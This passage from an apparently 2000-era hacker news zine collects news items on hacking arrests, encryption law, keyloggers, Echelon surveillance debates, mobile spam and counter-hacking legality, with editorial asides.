into a precarious game between administrators of online
Web sites and his own expertise. He said he started
hacking into local business sites, then graduated into
more complicated systems, like the Bureau of Land
Management National Training Center.
The Web sites he affected were typically dismantled for
only a matter of hours, he said. Police said he caused
$25,000 damage, a figure based on the costs of
installing secure sites and the time lost to users while
the software was repaired.
The teen, who dropped out of school because he was
"too bored," is a self-taught computer whiz who said he
started using a computer when he was 2 years old.
"I understand what I did was wrong," he said. "I'm
hoping something good will come out of it."
@HWA
36.0 [HNN] Junger wins in Appeals Court-Code Declared Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
Junger wins in Appeals Court - Code Declared Speech
contributed by Dan
The 6th Circuit Appeals Court has overturned a lower court ruling and
has concluded that the First Amendment does in fact protect computer
source code. Therefore they have remanded Peter Junger's case over
encryption exports back to the District Court for further
consideration.
6th Circuit Court Opinion
Associated Press - via World News
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
http://www.worldnews.com/?action
BAD URL - expired or deleted. - Ed
@HWA
37.0 [HNN] Bullet to Scan Hard Drives of Web Site Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
Code-named Bullet and developed by ISS, this new software lets
e-commerce companies scan a Web site visitor's hard drive to see if it
is infected with Trojan horses, viruses or other malicious software
that could be passed on to the e-commerce site. Few details about the
program are available, the release date and pricing has not yet been
announced. (Are companies going to warn users before they scan them?)
CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html
Frisking computers at the door
From...
April 6, 2000
Web posted at: 8:53 a.m. EDT (1253 GMT)
by Ellen Messmer
(IDG) -- ISS has developed an intrusion-detection application, code-named
Bullet, that lets e-commerce companies scan a Web site visitor's PC to see
if it is infected with Trojan horses, such as Back Orifice, or viruses that
could be passed on to the e-commerce site.
Trojan horses let intruders seize remote control of PCs, and that could mean
a compromise of an online banking system, for example, even when the correct
user identification is employed to access the site.
"Businesses are just getting fed up with the crap coming off the Internet,"
says ISS CEO Thomas Noonan, adding that one bank is expected to announce it
is using the ISS application on its home banking site this week.
The ISS application uses ActiveX technology to scan the laptop, and if
required, wipe out the unwanted, dangerous code. Noonan acknowledges that
use of the scanning application could touch off an invasion-of-privacy debate.
Further details about the application were not available. ISS has not announced
when the application will become generally available or how much it will cost.
@HWA
38.0 [HNN] Links to Web Sites Illegal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
The Osaka District Court has ruled that under certain conditions
linking one web site another would violate the law. While slightly
vague it would seem that simply linking to a site that violates the
law could be charged as aiding and abetting a crime.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
BAD URL - expired or deleted. - Ed
@HWA
39.0 [HNN] British Companies Complacent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
A study by the Department of Trade and Industry in Britain finds that
British business are too complacent when it comes to online security.
The Information Security Breaches Survey 2000 (ISBS 2000) found that
60% of companies have suffered a security breach and that 30% do not
feel they have anything worth protecting. It was also found that the
average costs of each intrusion was only �20,000. The study will be
released at Infosecurity Europe 2000 on 11 April at Olympia in London.
The UK Register
http://www.theregister.co.uk/000406-000023.html
BAD URL - expired or deleted. - Ed
@HWA
40.0 [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by William Knowles
In the first case of its kind in Hong Kong a teenager has been
sentenced to six months in jail after pleading guilty to 49 computer
crime-related charges. Two other accomplices where sent to detention
centers. The trio got to know each other online where they traded name
and password information on various accounts. The three have been
released on bail pending an appeal.
Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
@HWA
41.0 [HNN] Census Afraid of Electronic Intrusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
While the US Census Bureau claims that it is doing everything it can
to increase responsiveness it has deliberately played down the online
option. The Census feels that they have not adequately tested the
security options of the site. So while the site is active and
available it is not being publicized. (It won't get broken into if we
don't tell anyone about it.)
Online Census Form
Industry Standard - via Yahoo
http://www.2000.census.gov/
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html
@HWA
42.0 [HNN] Hardware Key Logger Introduced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Weld Pond
Software to monitor every key stroke has been around for a while but
now a New Zealand company has introduced a hardware device that is
small enough to be hidden inside the keyboard that does the same
thing. The small device known as KeyGhost will monitor and record
every key stroke on the keyboard and stores all data within itself.
KeyGhost will retail for between $99 and $309.
ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html
Tiny keyboard snooping device tracks passwords
Mon, 27 Mar 2000 11:06:12 GMT
Will Knight
Before you press the return button, check you're not bugged. Will Knight
reports.
A tiny device that can be hidden within a keyboard or a PS/2 plug and secretly
record half a million user keystrokes has been launched by New Zealand hardware
manufacturer, Working Technologies.
Unlike most surveillance technologies, 'Key Ghost' does not require any
software to be covertly installed. All data is stored directly on the device and
can be summoned by entering a "Personal Unlock Code" (PUC) through a keyboard.
The device can then be removed and the information retrieved by another computer.
The most obvious application of this technology is to capture usernames and
passwords or data that has been encrypted or otherwise protected on a machine.
Working Technologies also markets the add-on as a handy data recovery tool.
Working Technologies says the FBI uses similar technology to carry out computer
surveillance.
Key Ghost devices cost between $99 (�62) and $309 (�195).
@HWA
43.0 [HNN] Napalm Issue 4
~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Kynik
Issue 4 of Napalm has been released with articles on securing Solaris
2.x and musical intonation. (Now that's a weird mix.)
Napalm
http://napalm.firest0rm.org/
@HWA
44.0 [HNN] EU Set To Rewrite Human Rights
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by g.machine
Rules and treaties originally drawn up fifty years ago to outline
basic human rights failed to anticipate advancements in technology.
Now the European Union is attempting to rewrite those rules which
would included a ban on 'systematic interception' of electronic
communications. This would essentially ban Echelon and Frenchelon.
(Why do the Europeans seem to understand privacy so much better than
US lawmakers?)
Heise
http://www.heise.de/tp/english/inhalt/co/6724/1.html
Flaw In Human Rights Uncovered
Duncan Campbell 08.04.2000
Proposals for a new definition of human rights now before the European
Parliament would ban ECHELON and update data protection rules to latest
developments in telecommunications technology.
International spying on communications should be identified as a breach
of fundamental human rights, according to proposals now before the
European Parliament. The new proposals suggest that treaties and rules
on human rights drawn up 50 years ago or more failed to anticipate how,
in the Internet age, threats to personal privacy can easily cross
international boundaries.
According to the five page proposal, all future interceptions must
"have a legal basis, be in the public interest and be strictly limited
to the achievement of the intended objective".
"Any form of systematic interception cannot be regarded as consistent
with that principle, even if the intended aim is to fight against
international crime".
"Any Member State operating such a system should cease to use it".
If implemented internationally, the new extension of human rights would
outlaw the practice of signals intelligence (sigint), except when used
to fight crime or terrorism. Sigint systems are now used by many large
countries to spy on the diplomatic, commercial and personal communications
of allies as well as enemies. The proposals are likely to be particularly
bitterly fought by the British government, whose sigint agency GCHQ
co-operates with the US National Security Agency to run the world's
largest communications intelligence system, including ECHELON.
MEPs will be asked to endorse proposals intended to eliminate cross-border
spying between European nations as well as by nations outside the Union.
The plans follow two recent parliamentary discussions about international
communications surveillance, and in particular the US-run Echelon network,
which collects phone call, fax and data communications from satellite
communications links.
According to proposals prepared by Graham Watson, chairman of the EP
Committee on Citizens' Freedoms and Rights, Justice and Home Affairs,
the existing framework of human rights is defective. They "fall short
of what the citizens of Europe are entitled to expect, since they do
not protect them from interceptions carried out by a Member State of
which they are not nationals".
"European citizens, irrespective of their nationality, are guaranteed
fundamental rights at the highest possible level", Watson asserts.
If the resolution is passed by the full Parliament at a meeting in
Strasbourg later this month, the EU's president will be told that there
is an "urgent need" for the Council "to take ... necessary diplomatic
steps to prevent third countries from carrying out any form of
interception on the territory of the Union outside the framework of
the joint fight against organised crime". The President will be asked
to commence diplomatic negotiations with the United States and other
countries "to put an end to all forms of systematic and general
espionage by third countries vis-�-vis the activities of the Member
States of the Union, its institutions and its citizens".
It adds "even in the case of the fight against cross-border crime,
adequate safeguards governing interceptions should be drawn up" and
that "any form of interception by a Member State should be notified
to the Member States on whose territory the persons whose communications
are being intercepted are present".
The resolution also expresses irritation with "the current piecemeal
nature of the relevant laws and operational and organisational
arrangements" affecting interception in Europe. The "piecemeal
arrangements" include Schengen, Europol, and the Customs Convention.
According to Watson, these entail "different standards of protection"
and are "free of any real democratic and judicial scrutiny". Six of
15 EU states had also failed to comply with the EC directives on data
protection and on the privacy of telecommunications data.
The Committee also complains that the problems have been raised in the
"numerous written and oral questions tabled on this subject over the
last two years".
The proposals follow a two day hearing on data protection and
surveillance, held in Brussels in February, and statements made to
the Parliament by the EC and Council of Ministers at the end of March.
The Citizens Rights' Committee president is also presenting the lack
of formal international communications and data privacy as a global
problem. "On a world-wide scale, the rise of the information society
has not been accompanied by a corresponding revision of provisions on
data protection by the Council of Europe, the OECD and the WTO", he
says. The proposals call for UN guidelines on personal data and OECD
guidelines on privacy to be "given the status of binding texts - at
the very least between the States of the Union and their allies".
The new proposals do not include the appointment of a special
Committee of Enquiry by the European Parliament, a proposal put forward
last month by the Green Parties and their allies. Such a committee might
have been limited to looking at breaches of existing European community
law. Instead, Watson has asked that his and two other committees be asked
to prepare, by the end of the year a new and detailed report on the
problem of data protection and interceptions.
@HWA
45.0 [HNN] Dutch Want Their Own Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by root66
The Dutch Parliament is currently debating a bill that will give
increased powers to the Dutch Intelligence Agency BVD. If passed the
bill would allow the agency to intercept satellite communications at
random and search the intercepted traffic by keywords.
Heise
http://www.heise.de/tp/english/inhalt/co/6731/1.html
Echelon in Holland
Jelle van Buuren 11.04.2000 Dutch intelligence agency authorized to scan
satellite communications
The Dutch Intelligence Agency BVD is getting new powers. Among other
things, the powers to intercept communications will be extended. The
agency is authorized, if the government gets its way, to intercept
satellite communications at random and search the intercepted traffic by
keywords. Also, the BVD gets a new intelligence task: the gathering of
economical information. Holland goes Echelon, it seems.
The new 'Act on the intelligence and security agencies' (WIV), which is
currently debated by Dutch parliament, gives the powers of the BVD a new
legal basis. Actually, it means mainly the extension of investigative
powers. In each amendment on the original proposal, new powers are given.
For instance, in the first draft of the new Act, the BVD got the power to
intercept, record and listen into telecommunications. In the latest
amendment, from the beginning of this year, the power to 'receive'
telecommunications was added. This means the BVD is authorized to directly
pluck telecommunications, for instance GSM-traffic, out of the air. In
this way, the BVD is no longer dependent on the willingness of telcom
operators to intercept traffic, but can create for instance their own
parallel network of receivers to intercept all GSM-traffic. Also, this
prevents providers from 'leaking' about the fine work the BVD is doing in
this area.
The biggest extension, however, is the newly added article 25a. In this
article, the BVD is authorized to intercept at random all international
telecommunication that is not cable bound and scan the intercepted
communication on items of interest (persons, groups, keywords). According
to the explanatory note by the draft Act, this kind of random interception
is needed to investigate if by any chance interesting messages are part of
the international communication.
The government says nonchalantly that it can't be prevented that in this
manner the BVD gets acquainted with the content of the intercepted
communications, although that isn't - still according to the Dutch
government - the main purpose of the random interception.
"The searching is primarily an instrument for the reconnaisance of the
communication, to try to establish the nature of the communication and
the identity of the person or organisation that is communicating. That in
this way the agency gets acquainted with a part of the content of the
communication is inevitable, in order to establish who is communicating
and if it's a person or a group that has the interest of the agency. The
searching however is not directed to get acquainted with the full content
of the communication. In a certain way, this activity is comparable with
the listening in on telephone conversations, to check if the connection
is allright."
This seems like a very creative way of saying that interception isn't
really interception, but a mere technical testing of connections. And for
that, no legal or governemental warrant is needed...
Keywords
As important parts of the international telecommunications are transmitted
by satellites and beam transmitters, it is clear this article 25a
authorises the Dutch BVD to intercept all these communications. This means
an uncontrolled authority to intercept and scan all communication that is
not cable bound. This can have a great impact on the Internet traffic. As
a message on the Internet chooses the least busy route, and the heart of
Internet lays in the United States, there is a big chance that email send
within the Netherlands chooses an international route by satellite. In
future this can also be the case for telephone conversations. All these
messages can be intercepted and randomly searched. Even now, the phone
conservations between two big Dutch cities, Amsterdam and Rotterdam, are
being transmitted by beam transmitters.
In the first draft of the WIV, the Home secretary had to give permission
to the keywords the intelligence agency is using to scan the intercepted
traffic. In the latest amendment, the Home secretary only gets once a year
notification of the list of keywords, whereas the BVD is authorized to add
new keywords to its own discretion.
Besides that, the BVD is authorized to store all intercepted
communication. Where the first proposal of the Act stipulated that the BVD
has to destroy immediately all intercepted communication that isn't of
interest for them, the new amendment gives the BVD the right to store all
intercepted communication for a year.
In this way, the Dutch government is creating its own mini-Echelon. The
BVD uses for its interception tasks the facilities of the Technical
information processing centre (TIVC) of the Navy intelligence. This
centre, located at the Navy complex Kattenburg in Amsterdam, decodes
satellite traffic that is being intercepted by different ground stations.
The TIVC is working the same way as its big brother NSA, as showed by the
publication of internal documents in the Dutch daily De Haagse Courant in
1985. Satellite conversations were intercepted, recorded and selected by
keywords for further analysis. The intelligence the TIVC gathered was sent
to the Foreign Intelligence Service (IDB), till this unit was closed down
in 1994 after a serie of scandals. Since than, all signal intelligence is
in the hands of Navy intelligence.
According to a study of two Dutch Intelligence experts (Bob de Graaff and
Cees Wiebes, Villa Maarheeze, 1998), the TIVC is part of a broader
international network and works closely with other Western agencies. For
instance in 1972, the TIVC reported to the Mossad that Egypt and Libya had
developed a telephone- and telex-connection under sea. Israelian special
forces destroyed this connection, so Egypt and Libya had to communicate
again by satellites, which were an easy target for interception. According
to the authors, the American CIA protested in 1992 firmly against the
immanent dissolution of the IDB, because they were afraid Dutch signal
intelligence capacity would diminish.
Vital economic interests
The new power to intercept satellite communications at random will
undoubtfully be used for economic espionage. In the past, the signal
intelligence capacity already served economic purposes. In the above
mentioned study of the intelligence experts, examples of this are
mentioned. The authors speak of an "incestious relation" between the
intelligence services and Dutch industry. Leading persons of big dutch
companies, with establishments abroad, worked for the IDB. In exchange,
they got economic intelligence gathered by the TIVC. The Dutch
multinational Philips has, according to the study, close relations with
Dutch intelligence. The company installed interception devices in
telephone centres it sold to foreign companies and governments, the report
says.
In the proposed new 'Act on the intelligence and security services', the
BVD gets officially the task of economic intelligence gathering. The BVD
has to "protect vital economic interests", which is seen as a part of the
national security.
"The Dutch economy is highly dependent of economic developments in the
world; these developments are characterised by increasing
internationalisation and globalisation. Decisions taken elsewhere, can
have a sincere impact on the Dutch economy. It is possible to gather
intelligence on these developments in different ways, for instance by
cooperation with intelligence agencies of other countries. These agencies
however, wil take in account their own interests. In order not to be
dependent of information of third parties, the government thinks it is
necessary to build up its own information position and enforce it."
What excactly 'vital economic interests' are, is however wrapped in a
cloud of mystery.
"To end with, we remark that with the explicitation of 'vital economic
interests of the Netherlands' in the terms of reference of the BVD, also
the possibility is created - if it seems appropriate - to conduct
investigations in this area, where national security as such isn't in
danger or is difficult to argue for."
Encryption
The new powers of the BVD are also interesting because some articles are
related to cryptography and information technology. The BVD is authorized
to break into homes and offices to bug keyboards. Besides that, the BVD is
authorized to break into computers and steal, alter or delete information
that is stored in computers. In other words, the BVD is allowed to hack.
In this way, the intelligence agency can steal data from computers,
manipulate software, corrupt passwords or install a Trojan Horse, so
access is secured and cryptography can be bypassed.
Cryptography is a topic of special interest for the BVD. In the draft Act,
the power to undo encryption is being extended. In the first proposal the
BVD got the authority to decrypt encrypted communication and data "by
technical means". In the latest amendment this is extended to decryption
"by all possible means". According to the explanatory note, "practice has
shown there are other ways than just technical means to decrypt encrypted
communications."
This cryptic description seems to be directed at infiltrators who diddle
out passwords, or look over the shoulder when messages are encrypted, or
intelligence teams breaking into homes and offices in search of the little
piece of paper the password is written on.
The articles on the interception of telecommunication also contain remarks
on cryptography. Encrypted messages may be kept in storage as long as is
necessary for the BVD to decrypt them. The explanatory note says:
"Where telecommunication is concerned, of which the encryption is not
undone, and where the mere fact that cryptography has been used makes
this communication interesting for the agency, it is desirable to save
this communication to the moment the capacity exists or is being
developed to decrypt the communication."
So the use of a perfectly normal technique to protect ones privacy, trade
secrets or sensitive political information, is in the eyes of the Dutch
government a highly suspected act.
The draft Act also introduces the obligation for "every one" the
authorities believes has acces to the keys, to cooperate with the
intelligence agency in decrypting the encryption. Refusal is punishable
with a sentence of two years. The Dutch parliament has asked the
government if this means that suspects also are obliged to hand over the
keys.
The answer is not available yet. But if the governement confirms this
obligation also applies to suspects, this will be a clear violation of the
fundamental human rights, as stated for instance in the Treaty on the
protection of the Human Rights and Fundamental Freedoms. It means an
obligation to cooperate on your own condemniation and the reversal of the
burden of proof.
@HWA
46.0 [HNN] SPAM Goes Wireless
~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Unsolicited commercial email is finding new ways of interrupting our
lives with their unwanted and unwelcome messages. Companies are now
using wireless messaging services to page people with advertisements
for their products. the company responsible for the SPAM, plugout.com,
said that it was only a one time occurrence and will never happen
again. (That's one time too many, if everyone did it one time...)
Washington Post
http://www.washingtonpost.com/wp-dyn/business/A51301-2000Apr10.html
'Spammers' New Calling: Cell Phones
By Mike Musgrove Washington Post Staff Writer Tuesday, April 11, 2000;
Page E01
Mike Malarkey, a business-development manager for the District-based
educational Web developer Blackboard Inc., was in the middle of a meeting
last Thursday when his Nokia cell phone chirped, sounding a bit like the
low-battery warning.
When he checked it after the meeting, he saw that the battery was fine,
but he'd just received a text message on the phone's screen--an
advertisement for a Web site selling cell-phone accessories.
"I'm just surprised that it's progressed to phones," said Malarkey. He was
one of the first recipients of an apparently novel kind of unsolicited
electronic advertising, or "spam," sent via the text-messaging service on
his ATT Wireless phone.
Another ATT customer, Laurie Ann Ryan, a public relations director who
asked that her firm not be identified, was infuriated to receive the same
message last Thursday: "Clearly the sender knows it's going to interrupt
somebody's day." She called the ad "excessively aggressive and invasive"
because a cell phone is something users tend to carry with them all
day--unlike the personal computers that e-mail spammers have targeted for
years.
One veteran of the long-running fight against spammers said this abuse of
ATT's system should come as no surprise. "I expect to see more of it
unless this kind of thing is controlled," said Nick Nicholas, an
"evangelist" at the Mail Abuse Prevention System, an organization that
tries to get Internet providers to cut off spammers' access.
Nicholas noted ATT Wireless's configuration of its text-message system as
a possible vulnerability: Its customers automatically get an e-mail
address consisting of their phone number followed by "@mobile.att.net."
"Because of the way ATT sets up the e-mail account, all you need to do is
just try consecutive numbers," he said. Nicholas said ATT should have been
able to detect this "war dialing" approach and block the spammers' access.
ATT spokeswoman Alexa Graf hadn't heard of Plugout.com's unsolicited
transmission until a reporter called yesterday afternoon. "The last thing
we want to do is start spamming our customers," she said.
The text messaging service is an included feature with ATT's service;
customers are not billed for incoming text messages. Sprint PCS offers a
similar service, while Verizon Wireless (formerly Bell Atlantic Mobile),
Nextel and Cellular One charge extra for the ability to receive text
alerts.
A spokesman for Sprint PCS reported no spamming incidents and said, "We
have software that can detect a spam and is designed to prevent it from
happening."
The company behind the ad, Plugout.com, is a Fort Lee, N.J.-based
operation whose site has only been fully operational since February.
Rudy Temiz, the company's 22-year-old president, said yesterday afternoon
that he didn't plan to repeat the exercise but expressed no remorse
either, saying that the marketing technique had generated "quite a few"
sales.
"One of the reasons we're doing this," said Temiz, "is because every
single dot-com company isn't graced with venture capital and all us
smaller Web sites have to find more creative ways to get on the map." He
didn't reveal how many messages had been sent out or how he had obtained
his list of phone numbers but said, "We're only doing it one time. Nobody
in Washington, D.C., should ever hear from us again."
Nicholas, the anti-spammer, called Temiz's marketing, "more ignorance than
anything, ignorance of the economics of the Internet or of the culture of
the Internet."
Vincent Zahn, Plugout.com's director of strategy, further defended the
text ads. "What better way to reach your target market?" he asked, saying,
"We look at it as if we're doing these people a favor if they're looking
for these kinds of products."
Responded ATT customer Ryan, "They're not doing me any favors by
soliciting me over my cell phone."
� 2000 The Washington Post Company
@HWA
47.0 [HNN] Forget Fort Knox Now It's Fort Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Code Kid
RedWood City California based Equinix has just opened its bomb proof
Net shelter. The shelter is said to be more secure than Fort Knox to
protect the servers of third party companies housed inside. The
compound includes geometric hand-scanners, automated mantrap and other
fancy security devices. Equinix has already built two such shelters on
the East Coast and plans on 26 more throughout the county. (While
Equinix may have the physical security they do not provide any
Internet security. Doh!)
Wired
Reuters - via Yahoo
Equinix
http://www.wired.com/news/technology/0,1282,35550,00.html
http://dailynews.yahoo.com/h/nm/20000411/wr/tech_security_1.html
http://www.equinix.com
Wired:
Net Fort Opens to Mixed Reviews
by Lynn Burke 3:00 a.m. Apr. 12, 2000 PDT SAN JOSE, California -- The
opening of the new bomb-proof Internet shelter here Tuesday was a bit like
a Mafia wedding that couldn't decide whether it wanted to be top-secret or
front-page news. In the end, it ended up being neither.
The shelter, operated by Redwood City, California-based Equinix, is billed
by its owners as a Fort Knox-like bunker that will protect the very
infrastructure of the companies fueling the electronic economy of the
United States.
Unfortunately for Equinix, the San Francisco Chronicle plastered the
top-secret location of the facility on its front page Tuesday morning. But
even if the unmarked shelter is no longer such a secret, the sprawling
compound -- chock-full of fancy security devices including geometric
hand-scanners and automated mantraps -- does appear capable of protecting
the computers housed inside from physical attack.
But is the Internet under threat of such assault? Former National Security
Advisor Mike McConnell sure thinks so.
"Look at the World Trade Center bombing," he said. "The purpose of that
attack was to collapse Wall Street. If I'm the blind sheik (accused in the
attack), I say, 'Well, that didn't work.'"
Going after the bank is no longer a worthwhile strategy, he said. Now you
go after the bank's computers.
"If you're measuring e-commerce in billions and trillions," he said, "what
Equinix has provided here, in my view, is an absolute must."
Benchmark Capital analyst Andy Rachleff, whose company helped to pony up a
good chunk of the $80 million secured for second-round financing, says
Equinix has hopped in front of a security trend in e-business.
"This is monstrous," he said. "If you're going to put your business on the
Internet, you're going to put your servers in a facility like this."
The building, a renovated version of a former IBM facility, was rebuilt by
Bechtel Corporation, the brawn behind the Hong Kong International Airport
and Boston's Ted Williams Tunnel. Bechtel has entered into a $1.2 billion
contract to build 26 more of these hosting facilities. The company has
already built two on the East Coast -- in Virginia and New Jersey.
Jeff Thompson, a software developer for operating systems security
platforms provider Argus Systems, says sinking a bunch of capital into
this kind of facility is crazy.
The security industry isn't focused on external threats, he says.
"It's so much easier to break in over the public network," he said. "The
real problem is how easy it is to attack a system on a public network."
Indeed, the denial-of-service attacks earlier this year on several of the
Internet's biggest players were all electronically perpetrated over the
Internet itself. And Equinix officials say their facility won't prevent
those kinds of attacks.
"That's something our customers need to work out themselves," said vice
president of sales Peter Ferris.
There's little doubt that the industry is worried about security, physical
or otherwise.
According to a recent survey of Fortune 1000 corporate security
professionals by security corporation Pinkerton, the potential threat to
Internet sites and computer networks was identified as the industry's
second-biggest security concern.
A recent survey from the Computer Security Institute and the San Francisco
Federal Bureau of Investigation's Computer Intrusion Squad found that 90
percent of respondents -- primarily large corporations and government
agencies -- detected computer security breaches within the last 12 months.
While no one knows whether a campaign of terror against the Internet is in
the works or not, it may just be that a facility like Equinix's provides a
little extra measure of comfort in an industry that is defined by
volatility.
Bobby Robertson, a business developer with broadband provider Enron, said
Equinix has taken security to a whole new level, and has come up with the
most sophisticated hosting service he's ever seen.
"It's reassuring, for sure," he said. "I think security is very important,
and this is a very thoughtful approach."
Yahoo:
SORRY!
Url expired (see how badly we need news gatherers!!!!? - email me if you
want to help collecting articles! tnx cruciphux@dok.org - Ed)
@HWA
48.0 [HNN] TrustedBSD Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by tricky deamon
It seems the BSD family has a new member, TrustedBSD. TrustedBSD
provides a set of trusted operating system extensions to the FreeBSD
operating system, targeting the Orange Book B1 evaluation criteria.
TrustedBSD
http://www.trustedbsd.org/
@HWA
49.0 [HNN] 690,000 Illegal Web Pages on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Speaking in Sydney Australia last week, the president of the Business
Software Alliance, Mr Robert Holleyman, said there were at least
690,000 warez, appz and crackz Web pages on the Internet. (690,000?
Who went around and counted them all? By the time they finished half
of them were probably down.)
Sydney Morning Herald
http://www.smh.com.au/news/0004/11/text/bizcom04.html
Pirates display their booty on the isle of Zed
Date: 11/04/00
By PETER GOTTING
If you thought X-rated was bad, just wait till you see the Zs.
On the dark side of the Internet, the letter Z is used to pluralise almost
anything that is illegal.
Thus, warez, appz or filez refer to pirated software, computer games,
music and film downloads; serialz are software serial numbers and
passwordz are passwords that allow free entry to subscription-based
pornography sites.
For years, Internet users have swapped warez online. Those in the know can
easily find a free copy of applications such as Windows 2000, Adobe
Photoshop and Corel Draw; computer games such as Quake 3, KingPin and
Soldier of Fortune; and even movies such as Scream 3, Star Wars and Green
Mile. On a serialz page you can retrieve serial numbers for anything from
first aid computer programs to multimedia software.
And throughout the sitez are banners advertising pornography and links to
pages listing passwords to XXX material.
"The best illegal downloads" one site advertises; "Illegal MP3 arena"
another calls itself; "100% Illegal Pirated O-Day" one boasts.
The sites are nothing new, but copyright owners are getting scared. With
technological developments set to make it much easier to break the law -
broadband will reduce download times dramatically - software companies are
concerned.
Speaking in Sydney last week, the president of the Business Software
Alliance, Mr Robert Holleyman, said there were at least 690,000 warez,
appz and crackz Web pages on the Internet.
The Business Software Alliance - an international industry body
representing software companies such as Microsoft, Lotus, Adobe, Novell
and Symantec - estimates Internet piracy now involves more than $US1
billion ($1.67 billion) worth of software worldwide.
Mr Jim Macnamara, chairman of the alliance's local counterpart, the
Business Software Association of Australia, said technological
developments such as broadband and faster modems would aggravate the
problem.
"It's all necessary for the e-commerce revolution to happen," Mr Macnamara
said. "But, equally, we are concerned because illegal software will be
easier to access."
The sites are not hidden but quite blatant, Mr Macnamara said.
"They are quite unashamed. They do not do anything else. They openly boast
of what they have got on them."
A disclaimer on one site warns: "If you are affiliated with any
government, anti-piracy group or any other related group, or were formerly
a worker of one, you CANNOT enter this Web site, cannot access any of its
files and you cannot view any of the HTML files."
The sites say that threats against Internet service providers or
prosecutions of people affiliated with the page would breach the US
Internet Privacy Act.
Mr Macnamara suggested Internet service providers should be required to
compile contact details of Web sites owners which would be available to
police but not the public.
"Individual privacy should be protected but the hosts of sites should be
required to keep a record of who owns that site," he said.
"If you get a court order you should be able to locate who is doing that
and press charges.
"Often we do not even know where they are because there's no records
kept."
But the organiser of hackers group 2600 Australia, Mr Grant Bayley, said
most of the sites were hosted on free Web page hosting sites such as
Geocities and Angelfire, rather than through ISPs.
"A change in law won't achieve any of their objectives," he said.
Mr Bayley said 2600 did not condone any of the sites. Hackers were
interested in computer security and not breaking the law; crackers access
software illegally.
"The number of sites alleged to exist seems grossly exaggerated," he said.
But Mr Bayley suggested software companies should provide more programs to
consumers on a free trial basis.
"It's a problem of not offering enough of a sample," he said.
"People operating such sites are often under the age of 18 and do so more
out of interest in a product than a desire for professional gain. These
are people wanting to try out the software."
This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited.
(We disregard all such notices, news is in the public domain, we don't
charge for access to these archives, if anything we're doing the site(s)
a favour by disseminating their news. Legal action will result in a civil
disobedience action and will incur underground continuance of our zine.
- Ed)
@HWA
50.0 [HNN] Attacking the Attackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Just how legal is it to launch a counterattack against an online
attacker? Would you be committing just as big a crime as they are? How
can you be sure you are counterattacking the correct target? Should
laws be passed to legalize hostile responses?
CNN
http://www.cnn.com/2000/TECH/computing/04/07/self-defense.idg/index.html
Can you counter-attack hackers?
From...
April 7, 2000 Web posted at: 10:17 a.m. EDT (1417 GMT)
by Winn Schwartau
(IDG) -- You are running a Web site. Making money perhaps, and visitors
are seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?
In September 1998, the Pentagon reacted to a browser-based
denial-of-service attack by the hactivists Electronic Disruption Theater
by using offensive applets to shut down the attacking browsers. Clean.
Quick. Effective. But the Pentagon lawyers went ballistic within minutes.
The techies defending the Pentagon servers had broken too many laws to
enumerate - including a military prime directive, "posse comitatus," which
forbids the military from taking unilateral actions within the U.S. and
against U.S. citizens.
In addition, the techies by their actions had committed several federal
felonies for which hackers have gone to jail.
The simple truth is that it is illegal to disarm your online assailant.
Doing so requires that you take some offensive action - send out hostile
applets, return fire with your own denial-of-service tools or anything
else that will shut down the attack. The net effect is that both the
attacker and the victim (who is attacking back) are breaking the law.
At first glance, it doesn't make any sense: If you can disarm a
knife-wielding mugger, why can't you disarm your electronic mugger? But in
the physical world, you know who is mugging you. During the physical
attack there is a person with a knife, and while you may not know his name
or see his face, you are 100% sure that the knife you are taking away is
in the hands of a bad guy.
In the networked world, though, you cannot be sure the guy (IP address)
that seems to be attacking you is really the one attacking you. For
example, many of the zombie-based, distributed denial-ofservice attacks
that occurred in February were traced back to benign networks which were
merely unwitting hosts to remote-triggered Trojans located on their
servers.
Hostile perimeter defense is a really tough problem, and right now the law
protects the bad guys more than the good guys. I don't have a perfect
solution to this conundrum, but a few thoughts do come to mind:
Let the industry design a set of hostile response tools that will stop an
attack, but minimize harm just in case a zombie is in the middle. Then,
legalize the use of these tools.
Legalize hostile responses, and zombie computers be damned if their
security is so bad that their networks can be compromised. Build a
hardened back-channel on the Internet which will provide fast routing so
that trace-back and bad-guy ID is easier, faster, and with the cooperation
of the ISP community, automatic.
Develop an Internet-based Caller ID system so that Web sites know who's
there, what they're doing and can ignore all anonymous requests.
Do nothing: Let the bad guys continue to win.
So in the spirit of the networked community, I'm asking readers to help
